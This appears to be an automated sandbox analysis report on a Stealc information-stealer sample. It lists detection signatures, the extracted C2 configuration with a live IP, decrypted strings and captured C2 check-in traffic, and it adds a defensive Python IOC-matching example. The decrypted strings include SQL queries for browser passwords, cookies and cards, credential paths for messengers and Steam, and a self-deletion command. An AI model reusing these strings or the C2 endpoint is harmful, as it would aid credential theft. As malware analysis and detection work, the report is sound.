Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546537
MD5: 212e008d0b8a1d4874846987f37e34fa
SHA1: 0c125b1139dbbb0aa2fedfb916d1365001cce1e9
SHA256: d9d47fd94a18e02cb473ec8ed22d7d7f6ce79825f999d129d662f71409a48082
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 212E008D0B8A1D4874846987F37E34FA)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data-collection settings, and its development drew on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency-wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads seven legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Extracted malware configuration: {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.1698160628.0000000004B50000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7092 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7092 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.d0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T05:01:04.048750+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP
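Added example (not Joe Sandbox's or the malware's code): turning the extracted configuration and the Suricata alert above into network IOCs and applying them to HTTP requests. It keys on the C2 host and URL path from the configuration and on the report's "HTTP GET or POST without a user agent" finding; the Suricata alert records the same destination, 185.215.113.206:80. The two HTTP requests below are constructed, not captured from the sandbox, and the two-reason threshold is an assumption, not something the report states.

```python
"""Turn the extracted Stealc configuration into network IOCs and apply them to HTTP requests.

Added example (not Joe Sandbox or Stealc code). The configuration string is taken
from the report verbatim; the HTTP requests are constructed for illustration.
"""
import json
from urllib.parse import urlsplit

# Extracted configuration exactly as the report prints it.
RAW_CONFIG = '{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}'

# Constructed sample traffic (not captured from the sandbox): one request shaped like
# the C2 traffic the report describes (POST, no User-Agent), one ordinary browser
# request for contrast.
SAMPLE_REQUESTS = [
    b"POST /6c4adf523b719729.php HTTP/1.1\r\nHost: 185.215.113.206\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 4\r\n\r\ndata",
    b"GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]


def parse_config(raw: str) -> dict:
    """Split the C2 URL into the pieces a detection rule keys on."""
    cfg = json.loads(raw)
    url = urlsplit(cfg["C2 url"])
    return {
        "scheme": url.scheme,
        "host": url.hostname,
        "port": url.port or (443 if url.scheme == "https" else 80),
        "path": url.path,
        "botnet": cfg["Botnet"],
    }


def parse_http_request(raw: bytes) -> dict:
    """Minimal HTTP/1.1 request parser: request line, lower-cased headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def match_request(req: dict, ioc: dict) -> list:
    """Return the reasons a request looks like traffic to this sample's C2.

    Each reason mirrors a finding on the report: the C2 host and URL path from the
    configuration, and the 'HTTP GET or POST without a user agent' signature.
    """
    reasons = []
    host = req["headers"].get("host", "").split(":")[0]
    if host == ioc["host"]:
        reasons.append("Host header matches configured C2 address")
    if req["target"] == ioc["path"]:
        reasons.append("request target matches configured C2 path")
    if req["method"] in ("GET", "POST") and "user-agent" not in req["headers"]:
        reasons.append("HTTP %s without a User-Agent header" % req["method"])
    return reasons


def scan(requests: list, raw_config: str = RAW_CONFIG) -> list:
    """Score every request; flag it when two or more reasons fire (assumed threshold)."""
    ioc = parse_config(raw_config)
    results = []
    for raw in requests:
        req = parse_http_request(raw)
        reasons = match_request(req, ioc)
        results.append({"target": req["target"], "flagged": len(reasons) >= 2, "reasons": reasons})
    return results


if __name__ == "__main__":
    for r in scan(SAMPLE_REQUESTS):
        print(("FLAGGED " if r["flagged"] else "ok      ") + r["target"], r["reasons"])
```

A missing User-Agent on its own is a weak signal (plenty of scripts and agents omit it), which is why the example only flags on a combination; the host and path from the configuration are the strong indicators, and the path is the one to hunt for in proxy logs since the IP may change between builds.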

AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.d0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: http://185.215.113.206 | Virustotal: Detection: 19%
Source: http://185.215.113.206/6c4adf523b719729.php | Virustotal: Detection: 20%
Source: http://185.215.113.206/ | Virustotal: Detection: 19%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 0.2.file.exe.d0000.0.unpack | String decryptor (decrypted strings, in order):
    INSERT_KEY_HERE
    30
    11
    20
    24
    GetProcAddress
    LoadLibraryA
    lstrcatA
    OpenEventA
    CreateEventA
    CloseHandle
    Sleep
    GetUserDefaultLangID
    VirtualAllocExNuma
    VirtualFree
    GetSystemInfo
    VirtualAlloc
    HeapAlloc
    GetComputerNameA
    lstrcpyA
    GetProcessHeap
    GetCurrentProcess
    lstrlenA
    ExitProcess
    GlobalMemoryStatusEx
    GetSystemTime
    SystemTimeToFileTime
    advapi32.dll
    gdi32.dll
    user32.dll
    crypt32.dll
    ntdll.dll
    GetUserNameA
    CreateDCA
    GetDeviceCaps
    ReleaseDC
    CryptStringToBinaryA
    sscanf
    VMwareVMware
    HAL9TH
    JohnDoe
    DISPLAY
    %hu/%hu/%hu
    http://185.215.113.206
    bksvnsj
    /6c4adf523b719729.php
    /746f34465cf17784/
    tale
    GetEnvironmentVariableA
    GetFileAttributesA
    GlobalLock
    HeapFree
    GetFileSize
    GlobalSize
    CreateToolhelp32Snapshot
    IsWow64Process
    Process32Next
    GetLocalTime
    FreeLibrary
    GetTimeZoneInformation
    GetSystemPowerStatus
    GetVolumeInformationA
    GetWindowsDirectoryA
    Process32First
    GetLocaleInfoA
    GetUserDefaultLocaleName
    GetModuleFileNameA
    DeleteFileA
    FindNextFileA
    LocalFree
    FindClose
    SetEnvironmentVariableA
    LocalAlloc
    GetFileSizeEx
    ReadFile
    SetFilePointer
    WriteFile
    CreateFileA
    FindFirstFileA
    CopyFileA
    VirtualProtect
    GetLogicalProcessorInformationEx
    GetLastError
    lstrcpynA
    MultiByteToWideChar
    GlobalFree
    WideCharToMultiByte
    GlobalAlloc
    OpenProcess
    TerminateProcess
    GetCurrentProcessId
    gdiplus.dll
    ole32.dll
    bcrypt.dll
    wininet.dll
    shlwapi.dll
    shell32.dll
    psapi.dll
    rstrtmgr.dll
    CreateCompatibleBitmap
    SelectObject
    BitBlt
    DeleteObject
    CreateCompatibleDC
    GdipGetImageEncodersSize
    GdipGetImageEncoders
    GdipCreateBitmapFromHBITMAP
    GdiplusStartup
    GdiplusShutdown
    GdipSaveImageToStream
    GdipDisposeImage
    GdipFree
    GetHGlobalFromStream
    CreateStreamOnHGlobal
    CoUninitialize
    CoInitialize
    CoCreateInstance
    BCryptGenerateSymmetricKey
    BCryptCloseAlgorithmProvider
    BCryptDecrypt
    BCryptSetProperty
    BCryptDestroyKey
    BCryptOpenAlgorithmProvider
    GetWindowRect
    GetDesktopWindow
    GetDC
    CloseWindow
    wsprintfA
    EnumDisplayDevicesA
    GetKeyboardLayoutList
    CharToOemW
    wsprintfW
    RegQueryValueExA
    RegEnumKeyExA
    RegOpenKeyExA
    RegCloseKey
    RegEnumValueA
    CryptBinaryToStringA
    CryptUnprotectData
    SHGetFolderPathA
    ShellExecuteExA
    InternetOpenUrlA
    InternetConnectA
    InternetCloseHandle
    InternetOpenA
    HttpSendRequestA
    HttpOpenRequestA
    InternetReadFile
    InternetCrackUrlA
    StrCmpCA
    StrStrA
    StrCmpCW
    PathMatchSpecA
    GetModuleFileNameExA
    RmStartSession
    RmRegisterResources
    RmGetList
    RmEndSession
    sqlite3_open
    sqlite3_prepare_v2
    sqlite3_step
    sqlite3_column_text
    sqlite3_finalize
    sqlite3_close
    sqlite3_column_bytes
    sqlite3_column_blob
    encrypted_key
    PATH
    C:\ProgramData\nss3.dll
    NSS_Init
    NSS_Shutdown
    PK11_GetInternalKeySlot
    PK11_FreeSlot
    PK11_Authenticate
    PK11SDR_Decrypt
    C:\ProgramData\
    SELECT origin_url, username_value, password_value FROM logins
    browser:
    profile:
    url:
    login:
    password:
    Opera
    OperaGX
    Network
    cookies
    .txt
    SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
    TRUE
    FALSE
    autofill
    SELECT name, value FROM autofill
    history
    SELECT url FROM urls LIMIT 1000
    cc
    SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
    name:
    month:
    year:
    card:
    Cookies
    Login Data
    Web Data
    History
    logins.json
    formSubmitURL
    usernameField
    encryptedUsername
    encryptedPassword
    guid
    SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
    SELECT fieldname, value FROM moz_formhistory
    SELECT url FROM moz_places LIMIT 1000
    cookies.sqlite
    formhistory.sqlite
    places.sqlite
    plugins
    Local Extension Settings
    Sync Extension Settings
    IndexedDB
    Opera Stable
    Opera GX Stable
    CURRENT
    chrome-extension_
    _0.indexeddb.leveldb
    Local State
    profiles.ini
    chrome
    opera
    firefox
    wallets
    %08lX%04lX%lu
    SOFTWARE\Microsoft\Windows NT\CurrentVersion
    ProductName
    x32
    x64
    %d/%d/%d %d:%d:%d
    HARDWARE\DESCRIPTION\System\CentralProcessor\0
    ProcessorNameString
    SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
    DisplayName
    DisplayVersion
    Network Info:
    - IP: IP?
    - Country: ISO?
    System Summary:
    - HWID:
    - OS:
    - Architecture:
    - UserName:
    - Computer Name:
    - Local Time:
    - UTC:
    - Language:
    - Keyboards:
    - Laptop:
    - Running Path:
    - CPU:
    - Threads:
    - Cores:
    - RAM:
    - Display Resolution:
    - GPU:
    User Agents:
    Installed Apps:
    All Users:
    Current User:
    Process List:
    system_info.txt
    freebl3.dll
    mozglue.dll
    msvcp140.dll
    nss3.dll
    softokn3.dll
    vcruntime140.dll
    \Temp\
    .exe
    runas
    open
    /c start
    %DESKTOP%
    %APPDATA%
    %LOCALAPPDATA%
    %USERPROFILE%
    %DOCUMENTS%
    %PROGRAMFILES%
    %PROGRAMFILES_86%
    %RECENT%
    *.lnk
    files
    \discord\
    \Local Storage\leveldb\CURRENT
    \Local Storage\leveldb
    \Telegram Desktop\
    key_datas
    D877F783D5D3EF8C*
    map*
    A7FDF864FBC10B77*
    A92DAA6EA6F891F2*
    F8806DD0C461824F*
    Telegram
    Tox
    *.tox
    *.ini
    Password
    Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
    oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
    00000001
    00000002
    00000003
    00000004
    \Outlook\accounts.txt
    Pidgin
    \.purple\
    accounts.xml
    dQw4w9WgXcQ
    token:
    Software\Valve\Steam
    SteamPath
    \config\
    ssfn*
    config.vdf
    DialogConfig.vdf
    DialogConfigOverlay*.vdf
    libraryfolders.vdf
    loginusers.vdf
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: done
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: https
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: build
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: token
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: file
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: message
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_000E9030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_000DA210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_000D72A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DA2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_000DA2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_000DC920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1698160628.0000000004B7B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1698160628.0000000004B7B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_000E40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_000DE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000D1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000DF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_000E47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_000E3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000E4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_000DDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_000DEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_000DBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000DDF10

                Networking

                Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
                Source: Malware configuration extractor | URLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.206 | Connection: Keep-Alive | Cache-Control: no-cache
                Source: global traffic | HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GHCAKKEGCAAFHJJJDBKJ | Host: 185.215.113.206 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Ascii: ------GHCAKKEGCAAFHJJJDBKJ Content-Disposition: form-data; name="hwid" 2B9FB5817A3A4043728354 ------GHCAKKEGCAAFHJJJDBKJ Content-Disposition: form-data; name="build" tale ------GHCAKKEGCAAFHJJJDBKJ--
                Source: Joe Sandbox View | IP Address: 185.215.113.206
                Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
                Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000D62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_000D62D0
                Source: file.exe, 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206$P
                Source: file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/%
                Source: file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php7)
                Source: file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpG
                Source: file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206G
                Source: file.exe, file.exe, 00000000.00000003.1698160628.0000000004B7B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                Source: file.exe | Static PE information: section name:
                Source: file.exe | Static PE information: section name: .rsrc
                Source: file.exe | Static PE information: section name: .idata
                Source: file.exe | Static PE information: section name:
                Source: C:\Users\user\Desktop\file.exe | Code function: String function: 000D4610 appears 316 times
                Source: file.exe | Static PE information: Section: cbbjugzk ZLIB complexity 0.9947032003238927
                Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_000E9790
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_000E3970
                Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\EDWA6M3Y.htm
                Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                Source: file.exe | Static file information: File size 2137600 > 1048576
                Source: file.exe | Static PE information: Raw size of cbbjugzk is bigger than: 0x100000 < 0x19ee00

                Data Obfuscation

                Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.d0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;cbbjugzk:EW;lfmofsyx:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;cbbjugzk:EW;lfmofsyx:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000E9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_000E9BB0
                Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                Source: file.exe | Static PE information: real checksum: 0x2142c2 should be: 0x2115c3
                Source: file.exe | Static PE information: section name: cbbjugzk
                Source: file.exe | Static PE information: section name: lfmofsyx
                Source: file.exe | Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005AA056 push ebp; mov dword ptr [esp], eax | 0_2_005AA0C9
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D6041 push 15BCFBB8h; mov dword ptr [esp], edx | 0_2_005D60D7
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D6041 push esi; mov dword ptr [esp], ebp | 0_2_005D60F6
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0055F073 push ecx; mov dword ptr [esp], edi | 0_2_0055F084
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_000EE021 push es; iretd | 0_2_000EE06A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0056003F push ecx; mov dword ptr [esp], esi | 0_2_00560744
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005670CA push edi; mov dword ptr [esp], edx | 0_2_00567143
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B80F8 push eax; mov dword ptr [esp], esp | 0_2_005B819A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B80F8 push eax; mov dword ptr [esp], edi | 0_2_005B824B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B80F8 push ecx; mov dword ptr [esp], eax | 0_2_005B827C
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005B80F8 push 6A23A3F6h; mov dword ptr [esp], eax | 0_2_005B8356
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005470FF push 5CFC29DFh; mov dword ptr [esp], esi | 0_2_00547206
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0049D0E6 push edi; mov dword ptr [esp], 0B98CF4Ah | 0_2_0049D145
